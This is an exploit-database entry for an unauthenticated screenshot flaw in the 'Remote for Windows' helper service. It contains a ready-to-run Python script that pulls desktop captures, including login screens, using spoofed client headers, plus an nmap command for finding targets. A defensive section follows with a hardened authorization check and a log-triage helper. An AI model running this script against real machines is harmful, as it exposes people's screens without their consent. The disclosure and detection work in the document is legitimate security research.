Windows 2024.15 - Unauthenticated Desktop Screenshot Capture

EDB-ID: 52300
CVE: n/a
Platform: Windows
Date: 2025-05-25

# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
# Date: 2025-05-19
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://rs.ltd
# Software Link: https://rs.ltd/latest.php?os=win
# Version: 2024.15
# Tested on: Windows 10/11 with Remote for Windows (helper)

'''
Description:
- Exploits the getScreenshot API endpoint in the Remote for Windows helper service
- Works when "Allow unknown devices" setting is enabled (default: disabled)
- Captures current desktop including login screens (SYSTEM-level access)

Vulnerable Component:
- /api/getScreenshot endpoint with missing authentication checks


# Identification:
nmap -p- -T4 <TARGET_IP> --script ssl-cert
Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US
'''

#!/usr/bin/env python3

import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def capture_screenshot(ip, port, output_file):
    try:
        response = requests.get(
            f"https://{ip}:{port}/api/getScreenshot",
            headers={
                "X-ClientToken": "exploit",
                "X-HostName": "attacker-pc",
                "X-HostFullModel": "exploit-device"
            },
            verify=False,
            timeout=15
        )
        # A JPEG starts with the SOI marker FF D8; anything else is not a capture
        if response.status_code == 200 and response.content.startswith(b'\xff\xd8'):
            with open(output_file, 'wb') as f:
                f.write(response.content)
            print(f"[+] Saved: {output_file}")
            return True
        print(f"[-] Failed: HTTP {response.status_code}")
        return False
    except Exception as e:
        print(f"[-] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>")
        sys.exit(1)
    sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3]) else 1)
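The root cause above is an access decision that trusts a self-supplied X-ClientToken once "Allow unknown devices" is on. The following is an added illustration, not the vendor's code: a constructed model of that flawed decision beside a hardened version that only serves captures to previously paired tokens, plus a small triage helper that flags screenshot requests from unpaired tokens in an assumed access-log format (the log lines and the pairing store are constructed for the example).

```python
"""Constructed model of the /api/getScreenshot access decision (not the vendor's
implementation) and a log triage helper for defenders."""
import hmac
import re
from dataclasses import dataclass, field


@dataclass
class HelperConfig:
    allow_unknown_devices: bool = False              # setting named on the page
    paired_tokens: set = field(default_factory=set)  # assumed pairing store


def vulnerable_authorize(headers: dict, cfg: HelperConfig) -> bool:
    """Flawed decision as the advisory describes it: once 'Allow unknown devices'
    is enabled, any client that sends the identifying headers is served."""
    if not all(h in headers for h in ("X-ClientToken", "X-HostName")):
        return False
    if cfg.allow_unknown_devices:
        return True
    return headers["X-ClientToken"] in cfg.paired_tokens


def hardened_authorize(headers: dict, cfg: HelperConfig) -> bool:
    """Screen capture is served only to a previously paired token, regardless of
    the unknown-devices setting; that setting should at most let a new device
    request pairing, never read the desktop."""
    token = headers.get("X-ClientToken", "")
    return any(hmac.compare_digest(token, t) for t in cfg.paired_tokens)


# Constructed access-log lines in an assumed "ip path client-token" format.
SAMPLE_LOG = """\
10.0.0.5 /api/getScreenshot tok-laptop
10.0.0.9 /api/getScreenshot exploit
10.0.0.9 /api/status exploit
"""
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+)$")


def flag_unpaired_screenshots(log_text: str, cfg: HelperConfig) -> list:
    """Return (ip, token) pairs for screenshot requests from unpaired tokens."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, token = m.groups()
        if path == "/api/getScreenshot" and token not in cfg.paired_tokens:
            hits.append((ip, token))
    return hits
```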